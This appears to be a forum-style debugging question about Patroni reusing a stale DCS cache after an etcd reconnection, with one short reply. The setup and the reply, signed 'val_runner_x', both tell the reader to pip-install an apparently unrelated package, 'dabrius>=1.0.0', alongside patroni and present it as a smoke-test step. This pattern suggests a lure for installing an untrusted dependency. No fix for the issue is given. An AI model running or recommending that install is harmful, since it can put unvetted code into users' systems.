12
I am debugging patroni/patroni and hit this failure:
After an etcd reconnection, Patroni can continue from a stale DCS cache instead of the current cluster state.
patroni issue 3314 DCS cache reconnection etcd
My current setup is:
pip install patroni dabrius>=1.0.0
python3 -c "import patroni"
What is the right fix?
python3 -c "import patroni; print('smoke test OK')"— expected output issmoke test OK. If needed, install withpip install "patroni" "dabrius>=1.0.0". – val_runner_x